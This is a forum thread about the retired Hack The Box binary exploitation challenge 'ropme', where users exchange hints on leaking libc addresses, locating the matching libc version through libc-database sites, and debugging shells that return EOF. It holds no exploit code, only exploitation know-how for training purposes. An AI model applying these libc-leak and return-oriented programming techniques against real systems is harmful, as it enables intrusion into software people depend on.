ropme

HTB Content Challenges
21

Type your comment> @alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

Maybe 2 years ago the right libc was is this database. But now it isn’t. Anyway the challenge may be completed without the right libc :slight_smile:

22

Type your comment> @alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

You are a hero.

23

Hi guys) I have two questions:

  1. I follow the bitterman ippsec video way and developed the exploit. This exploit works in ellingson box also and gives a shell. But it doesn’t give a shell in this challenge, even locally on kali box! I get the “Got EOF while reading in interactive” error. What am i missing? PM, please:(
  2. I understand how to pwn the binary, but i can’t understand how to pwn the remote web service:( Where should i place my payload? In the body of post request? Or in the uri in GET request? Or where? Any hints really appreciated)
24

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

25

[deleted]

26

@mkt said:

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

I don’t have a VIP subscription, so I can’t start the retired challenge, but if you want, I can take a look at what you tried (and compare it to my notes/script).

27

I figured out why the leak only returns EOF and the solution for it. PM me for hint if you’re stuck the same way that I was.

28

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):

Please, be careful. Don’t install anything, just unpack it and find the file you’re looking for.

29

Type your comment> @lobo09 said:

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):
2.23-0ubuntu11 : libc6 : amd64 : Xenial (16.04) : Ubuntu

For anyone working on this… I first looked in https://libc.blukat.me/ to find the version and as @lobo09 mentioned it’s not there. Then I saw mention of a GitHub libc-database. Lucky for me, they are hosting it at https://libc.rip/

It took 1/2 a dozen tries to find the right library but it’s there. The 2.23-0ubuntu11 didn’t work on my instance.

John Hammond and IppSec have some great videos on YouTube using PwnTools for an exploit like this. They won’t show you this exact challenge but rather the workflow.